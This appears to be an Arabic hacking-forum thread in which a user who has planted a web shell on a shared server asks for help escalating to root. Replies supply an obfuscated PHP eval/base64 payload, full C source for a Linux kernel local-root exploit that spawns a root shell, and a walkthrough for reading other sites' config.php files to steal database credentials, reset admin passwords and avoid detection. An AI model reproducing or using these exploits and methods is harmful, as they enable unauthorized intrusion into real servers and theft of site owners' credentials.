![]() | رقم المشاركة : 1 (permalink) |
![]() بسم الله الرحمن الرحيم السلام عليكم شبآب . آولآ انا نزلت الموضوع هذآ في كذآ موقع هكر فمآ ااعرف فين المشكله عدم مبآلات او عدم خبره او مايبغون يساعدون فقلت ان شاء الله اخوانا العنآكب مايقصرون معآنآ رفعت شل على سيرفر كبير جدآ والصلاحيه يوزر والسيف مود اوف ورفعت شل بيرل احاول اتنقل على السيرفر يمنعني يطلع لي برومشن دينايد ls: /etc/valiases: Permission denied يعني انا رافع الشل على الموقع اليوزر حقه مثلا نقول اسمه admin فاذا حبيت اتنقل اكتب الامر هذآ /home/admin2 طبعا cd قبلها مو راضيه تجي معاي كتبت الامر اللي فوق في شل البيرل وطلع لي كذآ /home/admin2] يعني في المسار الصحيح مافي مشكله حاولت ارفع شل على الموقع هذا يطلع لي التصريح مرفوض اللي هو برمشن دينايد حاولت اتخطى صلاحيه اليوزر بكذآ شغله مامشي الحال قفلت اجرب اسحب الروت اللوكال اصداره : 2.6.34.6 #96 SMP Tue Dec 7 23:57:37 CST 2010 i686 i686 i386 GNU/Linux فياليت اللي يقدر يخدمنا في التنقل في صلاحيه اليوزر وسحب الكونفق اول يجيب لنا لوكال روت علىـ هذأ الاصدار ويكون مجرب ننتظر الاخوان العناكب وان شاء الله فيه استجابه Brb Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC la;gi Nv[, ]o,g [ldu hgafNf hig hgofvi : | |
| ![]() |
![]() | رقم المشاركة : 2 (permalink) |
![]() اهلا اخي الفاضل و الله انا مبتدئ في هذه الامور | |
| ![]() |
![]() | رقم المشاركة : 3 (permalink) | ||
![]() مو فاهمتك اخي يعني بدك تتنقل بالسيرفر بصلاحية اليوزر
| |||
| ![]() |
![]() | رقم المشاركة : 4 (permalink) |
![]() Okay Here Simple one bro hope Help you install uprobes /bin/sh and here We Go Php_eval كود: eval(gzinflate(base64_decode('NYzbCoJAEIavd2HfYRIvPERKF0FY0BP0AhVhNrmDpqJrJuG7N2oNzOmfb/7A85QEDw5xa3RZw+l4Sdseuc1yUlZ9Tak2sA7D7agFSippE+whjJTsNOUIDu872IQcLnyUFHZOBTJSlQ29rymaqmvpzpjLP4Ie4CzwWZnemUB3fhI/s5waw5YZ9kuwX7nLPhgn+s9OqMBEl+N1ZZ0LK5qkW41xNo0DF04QNvk+K8MX'))); ![]() التعديل الأخير تم بواسطة anti-trust ; 02-17-2011 الساعة 03:27 PM. | |
| ![]() |
![]() | رقم المشاركة : 5 (permalink) |
![]() كود: /* * R00TED ;) (again) */ #include <sys/types.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <inttypes.h> #include <sys/reg.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <string.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int kernelmodecode(void *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } static void docall(uint64_t *ptr, uint64_t size) { commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("symbol table not available, aborting!\n"); exit(1); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("symbol table not available, aborting!\n"); exit(1); } uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF); printf("mapping at %lx\n", tmp); if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } for (; (uint64_t) ptr < (tmp + size); ptr++) *ptr = (uint64_t)kernelmodecode; __asm__("\n" "\tmovq $0x101, %rax\n" "\tint $0x80\n"); printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid()); execl("/bin/sh", "bin/sh", NULL); printf("no /bin/sh ??\n"); exit(0); } int main(int argc, char **argv) { int pid, status, set = 0; uint64_t rax; uint64_t kern_s = 0xffffffff80000000; uint64_t kern_e = 0xffffffff84000000; uint64_t off = 0x0000000800000101 * 8; if (argc == 4) { docall((uint64_t*)(kern_s + off), kern_e - kern_s); exit(0); } if ((pid = fork()) == 0) { ptrace(PTRACE_TRACEME, 0, 0, 0); execl(argv[0], argv[0], "2", "3", "4", NULL); perror("exec fault"); exit(1); } if (pid == -1) { printf("fork fault\n"); exit(1); } for (;;) { if (wait(&status) != pid) continue; if (WIFEXITED(status)) { printf("Process finished\n"); break; } if (!WIFSTOPPED(status)) continue; if (WSTOPSIG(status) != SIGTRAP) { printf("Process received signal: %d\n", WSTOPSIG(status)); break; } rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); if (rax == 0x000000000101) { if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) { printf("PTRACE_POKEUSER fault\n"); exit(1); } set = 1; //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0); } if ((rax == 11) && set) { ptrace(PTRACE_DETACH, pid, 0, 0); for(;;) sleep(10000); } if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) { printf("PTRACE_SYSCALL fault\n"); exit(1); } } return 0; } | |
| ![]() |
![]() | رقم المشاركة : 6 (permalink) | ||
![]() وعليكم السلام ورحمه الله وبركاته. /home/vbspiders/public_html/shell.php هل لاحظــت يوجد شبه بإسم الموقع وإسم اليوزر الهدف Dr.NaNoطيب بعد ما تعمل اتصال عكسي او ترفع ملف بيرل او اي ملف لسحب الكوفينقات من اي سكربت ويوجد كثير سكربتات ..المهم الان نحن نريد سحب كونفيق صاحب اليوزر هذا شوف .: /home/Dr.NaNo/public_html/ طيب اولا قبل لا نسحب كيف نعرف اذا اليوزر هذا مركب [ سكربت على موقعه يمكنكـ البحث عن طريق محرك البحث bing.com اكتب فيه ip:xxxx بدل الـ xxxx بالأي بي تبع السيرفر وراح تطلع لك جميع المواقع .. ثم ابحث عن اليوزر الهدف الي هو Dr.NaNo وراح تجد الموقع ملاحظــة اسم الموقع يختلف عن اسم اليوزر للموقع لكن قد تلاحظ شبه قريب لهما . مثلا .: إذآ اليوزر الهدف Dr.NaNo الموقع التابع له هو .: www.Dr.NaNo-anti-trust.com تمام الان نفتح الموقع وراح تجد بأسفل الصفحه مكتوب powered by xxx بدال الـ xxx يكون مكتوب إسم السكربت .. مثلا لو وجدنا انا صاحب الموقع مركب سكربت vbulletin واسم مجلد السكربت على الموقع vb راح يكون هكذا مثال .: www.Dr.NaNo-anti-trust.com/vb الان كل شي تمام عرفنا السكربت الي مركب على الموقع.. طيب الان نرجـع لـ الشل تبعنا ومسارنا هو .: /home/vbspiders/public_html/shell.php تمام الان نحن على مسار الشل تبعنا طيب لو نتصل عكسي بالسيرفر او تستخدم احد ادوات سحب الكوفينقات لكي تسحب اي ملف على السيرفر. المهم لو فرضنا معانا اداءة سحب الكوفينقات.. نكتب بداخلها هكذا .. /home/Dr.NaNo/public_html/vb/includes/config.php راح اشرحها لك بالتطبيق.: /home/Dr.NaNo/public_html http://www.vbspiders.com/vb/forumdisplay.php?f=308وهو مسار اليوزر الهدف والموقع تبع اليوزر هو .: www.Dr.NaNo-anti-trust.com vb اما هذا فهو اسم مجلد السكربت الذي مركبه صاحب الموقع . includes/ اما هذا فهو مجلد انكلد وهو مجلد حماية ويوجد بداخله ملف الكونفيق الذي نريد سحبه .ودائما سكربتات vb يكون مسار الكونفيق تبعهم هو. includes/config.php config.php اما هذا الملف فهو ملف الكونفيق الذي نريد سحبه وبداخله [ معلومات القاعدة ] اإسمها واليوزر تبعها والباسورد. بعد السحب نرفع اداءة الاتصال بـ [ قواعد البيانات ] وندخل اليوزر والباسورد الي استخرجناهم من ملف الكونفيق وراح يتم الاتصال بالقاعده ومن هناك يمكنك تغير باسورد الادمن والايميل واليوز اذا اردت وبعدها اذهب للموقع تبع صاحب اليوزر وادخل على السكربت ثم اذهب لـ لوحه التحكم وادخل اليوزر والباسورد الي غيرتهم في قاعدة البيانات والف مبروك عليكـ الاختراق. وهكذا الطريقــة مع باقي السكربتات وكل سكربت يختلف عن الثاني فـ يوجد سكربتات كثيره ومسار الكونفيقات تبعهـ تختلف. وأنصحكـ عدم التسرع واللعب في هذا السيرفر انتظر بعض الوقت [ ناظر شروحات وطرق للتخطي وطبق وحاول وطبق حتى تنجح ] طبعا اذا كنت اول مره ترفع شل على موقع فـ انا انصحكـ تتدرب عليه ولا تمسح ملفات في الموقع لكي لا يشك صاحب الموقع او السيرفر ويمسح الشل عليك بعدين ويكشتف مكان الثغره [ ويرقعها ويروح عليك السيرفر.. ].. وانصحكـ تتابع هذه الدورة الجميلــة إن شاء الله تنفعـكـ .: وبالتوفيق لـكـ وللجميع يارب. في أمان الله. Dr.NaNo
| |||
| ![]() |
![]() | رقم المشاركة : 7 (permalink) | ||
![]() ملاحظــة.:
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
|
|